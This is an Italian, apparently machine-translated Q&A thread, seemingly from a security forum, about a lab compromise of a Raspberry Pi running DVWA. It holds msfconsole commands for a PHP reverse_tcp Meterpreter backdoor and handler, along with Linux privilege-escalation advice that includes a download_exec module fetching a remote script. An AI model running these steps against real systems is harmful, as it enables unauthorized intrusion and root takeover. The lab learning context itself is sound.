MSFConsole / Kali Linux: ottieni l'accesso come root al sistema unix

9

Sto scherzando con Kali Linux, MSFConsole e DVWA (dannatamente vulnerabile applicazione Web).

Sono riuscito a entrare nel sistema con successo (Raspberry Pi) creando una backdoor PHP e caricandola tramite SQL injection.

Ora ho accesso al sistema, l'unico problema è che sto funzionando come www-data (non sarebbe bello diventare root per creare il tuo account super-utente ?!) E 'possibile in qualche modo privilegiare l'escalation in Linux (Raspbaian) usando MSFConsole, BASH (dalla backdoor) o in un altro modo?

Ho provato a lanciare "use priv" nel prompt meterpreter ma l'errore che ottengo è "Impossibile caricare l'estensione: nessun modulo del nome ext_server_priv.php trovato". Se è d'aiuto, sto utilizzando l'exploit reverse_tcp come script PHP.

Sono stato in grado di compromettere il sistema eseguendo questo è Msfconsole

use php/meterpreter/reverse_tcp
set LHOST <my IP>
generate -t raw -f hackme.php
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST <my IP>
exploit

Ho quindi caricato hackme.php sul server web tramite il caricamento di file non sicuro, dopo che l'ho fatto ho quindi navigato nel file caricato.

Il credito va a questo video per avermi dato il codice sopra. (Ho dovuto usare la funzione di generazione invece di msfpayload perché quella funzionalità è stata spostata a causa della sua deprecazione.)

    
posta iProgram 09.08.2015 - 19:29
fonte

3 risposte

5

A questo punto hai raggiunto le basi di un compromesso sul sistema e sei sulla fase comune due dello sfruttamento che è l'escalation dei privilegi.

Il modo in cui è possibile ottenere risultati dipende molto dal sistema in questione, dal codice installato e dal modo in cui è stato configurato. Alcune opzioni per le cose da cercare per ottenere l'escalation dei privilegi su un sistema Linux

  • SetUID binari di root che possono essere scritti dall'utente che si sta eseguendo come. se riesci a trovare qualcosa, puoi sovrascrivere il quale, una volta eseguito, verrà eseguito come root, puoi utilizzarlo per aumentare i tuoi privilegi.
  • Vulnerabilità nei servizi di sistema in esecuzione come root. Questo probabilmente dipenderà dallo stato della patch del sistema su cui stai lavorando.

Altre cose che si applicano di più nei test di sicurezza "reali" ma che probabilmente non si applicano alla tua situazione

  • Credenziali esposte nei file sul sistema. Questo può essere un modo comune per sfruttare i sistemi.
  • Attacchi per indovinare la password. Le credenziali di indovinare sono un buon modo per ottenere un accesso aggiuntivo
  • Pivoting dal tuo sistema attaccato a un altro nella stessa rete. Tipicamente, una volta che un attaccante ha un punto d'appoggio in una rete, effettuerà la scansione di altri sistemi che potrebbero avere ulteriori configurazioni intermedie che potrebbero essere sfruttate.
risposta data 13.08.2015 - 09:52
fonte
1

Secondo la documentazione di metasploit, l'utente privato è un modulo disponibile solo al tester meter di Windows nativo (non altri meterpreters).

Probabilmente vorrai esaminare l'escalation dei privilegi di unix, di cui non sono a conoscenza. Non credo che ci sia un modulo automatizzato per metasploit che lo farebbe ...

Buona fortuna;)

    
risposta data 13.08.2015 - 09:20
fonte
1

Puoi aggiornare la tua shell ad un Meterpreter con sessioni -u < # > e quindi eseguire i moduli post (ad esempio, post / multi / recon / local_exploit_suggester) oppure puoi anche prendere una sessione esistente (Meterpreter o meno) ed eseguire un exploit di escalation dei privilegi locali, ad es. udev_netlink, sock_sendpage, et al, impostando la SESSIONE variabile.

Alcuni moduli variano a seconda del sistema operativo o dello scenario, alcuni sono solo difficili da trovare nella gerarchia metasploit-framework. Prova il seguente comando da meterpreter:

show post

run post/multi/<tab><tab>

run post/linux/<tab><tab>

run exploit/multi/<tab><tab>

Puoi anche eseguire una varietà di strumenti di escalation dei privilegi al di fuori del metasploit-framework e avviarli nella tua sessione. Ecco due moduli che aiutano in questo sforzo:

use post/multi/gather/multi_command

set RESOURCE cmds.rc

use post/linux/manage/download_exec

set URL http://10.0.0.1/cmds.sh

Ti suggerisco di preparare un sistema in un laboratorio che corrisponda alle qualità del tuo sistema di destinazione, ad esempio, stesso sistema operativo, patchlevel, installabili, impostazioni di configurazione, ecc. Mantenendo l'accesso di root su questo target di laboratorio simulato, puoi ricreare ciò che tenterai di fare al vero bersaglio. Molti strumenti di privilegio-escalation richiedono l'accesso come root per eseguirli correttamente, ad esempio, Nessus e OpenVAS in modalità credenziali, CIS-CAT, ovaldi, cvechecker, lynis, unix-privesc-check e enum4linux sono tutti ottimi strumenti in questo spazio. Gli altri dovranno essere eseguiti solo sul vero sistema di destinazione, come sucrack o phrasendrescher. Alcuni attacchi di escalation di privilegi richiedono una pianificazione significativamente maggiore, ad esempio lo sfruttamento dei binari setuid / setgid personalizzati . L'RPi richiederà probabilmente un cross-compiler per gli exploit, e molti potrebbero non funzionare nemmeno a meno che tu non modifichi gli offset per lavorare con registri, opcode e endianness della piattaforma ARM.

    
risposta data 13.08.2015 - 15:44
fonte

Leggi altre domande sui tag